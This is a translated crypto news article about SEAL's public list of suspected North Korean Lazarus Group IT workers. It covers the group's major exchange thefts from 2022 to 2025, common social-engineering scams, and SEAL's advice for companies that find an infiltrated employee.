How to identify and counter the "North Korean hacker group" around you?

CN
Odaily星球日报
Follow
2 hours ago

Original | Odaily Planet Daily (@OdailyChina)

Author | CryptoLeo (@LeoAndCrypto)

The crypto world has long suffered from North Korean hackers!

Recently, the security organization Security Alliance (SEAL) published a post titled "Helping You Identify Real North Korean Developers," accompanied by six photos of North Korean hackers from their launched website. Additionally, Security Alliance disclosed the source website of the images: lazarus.group

Everyone should be familiar with the Lazarus Group, the notorious North Korean hacking organization. The post quickly sparked heated discussions on social media because North Korean hackers are disguising themselves as internet developers, engineers, and other identities to infiltrate projects/companies and launch various attacks to steal their funds, causing projects to "die young."

Track Record - North Korea's Biggest Puppet Master Lazarus Group

As North Korea's largest hacking organization, they have been involved in every major hacking incident in recent years, stealing vast amounts of crypto assets from various institutions/companies using various hacking techniques. They even ranked third in the list of government entities holding Bitcoin, surpassing Bhutan and El Salvador, with holdings only behind the United States and the United Kingdom.

Related Reference: "Lazarus Group Ranks in the Top Three for Bitcoin Holdings, Is North Korea Also Engaging in Crypto Strategic Reserves?"

In fact, Lazarus Group's theft activities are far from limited to the crypto industry; their "business" is extensive, including stealing bank funds, sensitive data, trade secrets, military intelligence, and ransom. Some have suggested that Lazarus Group's operations are sometimes not solely for money but also involve stealing official technology/data to support North Korea's technological development and attempting to create chaos to support geopolitical goals.

For the crypto world, Lazarus Group's operational track record over the past four years is as follows:

2022: Axie Infinity Stolen Over $600 Million in Crypto Assets

Specifically, the hacker contacted an engineer from Axie Infinity developer Sky Mavis through LinkedIn and WhatsApp, luring them into an interview with a new job opportunity. After several rounds of interviews, the engineer received an extremely lucrative job offer and a fake offer sent as a PDF file. After downloading the PDF, the embedded Trojan infiltrated the Ronin system, allowing the hacker to steal funds by taking over the Ronin network validator.

2023: Poloniex and HTX Stolen Over $200 Million

The theft from Poloniex and HTX was due to private key leakage. The hacker infiltrated and monitored Poloniex for an extended period using advanced persistent threat (APT) techniques, eventually gaining access to the hot wallet. APT attacks are characterized by high concealment, clear targeting, persistence, and advanced attack methods.

Both platforms are related to Sun Yuchen (indicating that he was targeted at the time).

2024: DMM Bitcoin ($300 Million) and WazirX ($230 Million) Stolen Over $500 Million

In May 2024, the Japanese crypto exchange DMM Bitcoin detected an improper outflow of 4,502.9 Bitcoin from its wallet. The Japanese Financial Services Agency requested DMM to investigate the cause of the theft and provide a compensation plan for customers. Subsequently, an official statement was released stating that the theft was due to TraderTraitor using social engineering attacks, posing as a LinkedIn recruiter, and tricking an employee responsible for managing DMM trading at Ginco Inc. into downloading malicious program code, thereby controlling trade requests and transferring funds to the hacker's wallet. DMM also promised to compensate customers but closed in December 2024 due to financial pressure, after which customer accounts and assets would be migrated to SBI VC Trade on March 8, 2025.

In July 2024, the Indian trading platform WazirX was hacked, with losses amounting to approximately $230 million. The investigation report indicated that the theft was due to a multi-signature wallet at WazirX being attacked, where the attacker exploited a "discrepancy" between the Liminal interface and actual transaction data to trick three signers from WazirX and one signer from Liminal into approving a seemingly normal transaction (such as a regular USDT transfer). In reality, this transaction contained a malicious payload that altered the wallet's smart contract logic. After the alteration, the attacker gained complete control without needing WazirX's keys to transfer all funds.

2025: Bybit Stolen $1.5 Billion

In February 2025, Bybit was hacked for $1.5 billion, marking the largest crypto theft in history. Specifically, a developer's computer with system release permissions was compromised, and the attacker uploaded a modified JavaScript code file in the Safe on AWS S3 bucket, containing malicious logic targeting only Bybit's Ethereum Safe wallet and an unknown wallet (presumably used for testing validation by the attacker), thus completing the breach of the Safe{wallet} front end. Subsequently, during normal token transfers between hot and cold wallets, all Safe{wallet} users saw and used a front end embedded with malicious code. Therefore, Bybit multi-signature participants saw completely normal information displayed on the Safe{Wallet} front end. Ultimately, the hacker deceived multiple (three) signers and gained control of the multi-signature wallet through malicious transactions, completing the attack.

All of the above are hacking theft incidents involving or indirectly involving Lazarus Group, with enormous amounts and professional methods. Many theft incidents were not due to security vulnerabilities or human errors, yet funds were still lost under the long-term monitoring of Lazarus Group, which can be said to be omnipresent.

CZ's Warning: Common Scams by Lazarus Group

After the post was published, CZ quickly retweeted it and listed some common scams used by North Korean hackers:

  1. Pretending to be job seekers, trying to secure positions in companies. This allows hackers to get close to their attack targets, especially favoring positions in development, security, and finance;

  2. Pretending to be employers, trying to interview/hire your employees. During the interview, they may claim there is a problem with Zoom and send the interviewee a "link to update," which contains a virus that will control the employee's device. Alternatively, they may present a programming question to the employee and then send some "sample code";

  3. Disguising as users. Sending you links in customer support requests, which lead to pages that download some kind of virus;

  4. Bribing company employees and outsourcing vendors to obtain data. Months ago, a major outsourcing service company in India was hacked, leading to a data breach of users from a major American exchange, resulting in user asset losses exceeding $400 million (or for Coinbase).

Finally, CZ urged companies to train employees not to download unknown files and to carefully screen applicants.

These attacks are not only applicable to companies; individuals should also be vigilant in similar situations, such as when encountering links from strangers or screen sharing, especially in the crypto industry. Many people experience clipboard hijacking or address poisoning via clipper malware during transfers after being attacked, which are among the most common attack methods: when users copy wallet addresses (BTC, ETH, SOL addresses), the software automatically replaces them with similar addresses controlled by the attacker. These replacement addresses often have nearly identical beginnings and endings (for example, the first 4-6 characters and the last 4-6 characters are the same), leading to transfers being sent to hacker-controlled addresses.

Additionally, links received from strangers on social media should also be approached with caution, as they may contain viruses.

A Blacklist - Data and Countermeasures Related to North Korean Hackers

Currently, the lazarus.group website has updated a list of 63 hackers, each with different backgrounds and statuses. These hackers tend to identify as developers, smart contract engineers, and software engineers (targeting Web 3, blockchain, and backend development), but the information on the list is likely not their real information, but rather profiles fabricated by Lazarus Group team hackers or members or associates of Lazarus Group, many of whom are still employed in companies.

The interface lists their former names, social accounts (emails, Twitter, phone numbers, etc.), GitHub accounts, employment records, captured images, and even includes crypto wallet addresses, along with more detailed "resume" analyses (such as traces of LinkedIn forgery, IP anomalies, etc.). This data can help HR and companies quickly detect whether interviewees and employees pose a risk.

In addition, the website has launched a feature to verify job seeker accounts, including verification of X, GitHub, TG, DC, websites, and emails (free).

The SEAL Frameworks also helps you better understand security-related knowledge. The document mentions:

North Korean IT workers often use false identities to engage in remote IT work for foreign companies, and these workers are an important source of income for the regime, especially for its weapons programs. They engage in various IT jobs (but not limited to IT), frequently disguising their identities and locations to secure freelance contracts and generate income, which is sent back to North Korea. These workers are primarily based in China and Russia, with some distributed across certain regions in Asia, Africa, and Latin America.

The document indicates that North Korea also operates a network of "facilitators" to help them conceal their identities and facilitate remote online work. Facilitators lend their digital and physical identities for profit, and their clients are mostly North Korean hackers.

Since 2010, the number of North Korean IT workers has increased, their geographical distribution has become broader, and their activities have diversified, with the main objectives being:

- To create stable income for the North Korean regime through remote IT work;

- To build a support network for North Korea's IT-related businesses (smuggling and money laundering);

- To acquire technology, infrastructure, and identity information (including personal and company, digital and physical identity information) from Western companies;

- To leak company secrets (intentionally or unintentionally);

- To extort (ransomware and blackmail);

- To evade sanctions (North Korean entities are prohibited from receiving any form of payment from Western countries);

- To conduct hacking attacks (establishing permanent access to infrastructure for foothold or infiltration);

- To deploy malware (infecting high-value targets for future theft).

Currently, the estimated number of North Korean hackers active in various companies and government agencies ranges from 2,000 to 15,000. However, this number includes multiple identities or inactive accounts used by the same actor. SEAL estimates that among all Web 3 developers, about 3-5% are North Koreans, with at least 200-300 North Korean-related accounts actively seeking employment opportunities in Web 3 companies at any given time.

SEAL Frameworks also provides some recommendations for when companies discover employees have ties to the Lazarus Group:

- Do not immediately fire them; maintain normal performance while ensuring organizational security to avoid alerting them.

- Immediately halt all payments; if suspected, delay payments under the pretext of "financial issues."

- Systematically revoke all access to code repositories, cloud infrastructure, and internal systems. At the same time, collect all available data (such as customer verification documents, cryptocurrency addresses, emails, resumes) for reporting.

- Conduct a comprehensive security audit of all code contributions, paying close attention to dependencies, build files (continuous integration/continuous deployment), and potential backdoors.

- After all security risks have been completely eliminated, terminate their contracts for business-related reasons (such as downsizing or changing direction) and report the matter to law enforcement.

Continuously Updated Blacklist - Short-term Effectiveness or Long-term Benefits

Regarding the public listing behavior of lazarus.group: Most people believe that this list can help companies better identify risky employees or interviewees, potentially reducing the occurrence of hacking incidents.

Publicly sharing hacker-related data may have some short-term effects, but in the long run, since the list is publicly visible, hackers who find themselves on the list are likely to modify their public account information and personal details. SEAL's response is that many people will still habitually use certain familiar accounts, thus revealing themselves. Currently, with the support of AI deepfake technology, hackers may be able to update all personal information or even completely change their identities, so the release of the list will only make hackers' disguises more secretive and harder to detect, especially since many people in the crypto industry work online.

免责声明:本文章仅代表作者个人观点,不代表本平台的立场和观点。本文章仅供信息分享,不构成对任何人的任何投资建议。用户与作者之间的任何争议,与本平台无关。如网页中刊载的文章或图片涉及侵权,请提供相关的权利证明和身份证明发送邮件到support@aicoin.com,本平台相关工作人员将会进行核查。

Share To

Related Articles

avatar
avatarTechub News
31 minutes ago
Google paper reveals the rise of the silicon-based economy: super-financialization of AI agents and blockchain.
avatar
avatarTechub News
32 minutes ago
Don't miss the wealth train of Web3 AI: 11 potential projects recommended
avatar
avatarAiCoin
45 minutes ago
ETH Plunge Storm: Technical Support Breakdown and Low Sentiment Trigger Chain Liquidation
avatar
avatarTechub News
51 minutes ago
The New Frontier of Sovereign Capital: An Overview of Global State-Led RWA Projects
avatar
avatarOdaily星球日报
54 minutes ago
B² Hub Evolution: Driven by Pulsar, making blockchain transactions as fast as Web2
APP

X

Telegram

Facebook

Reddit

CopyLink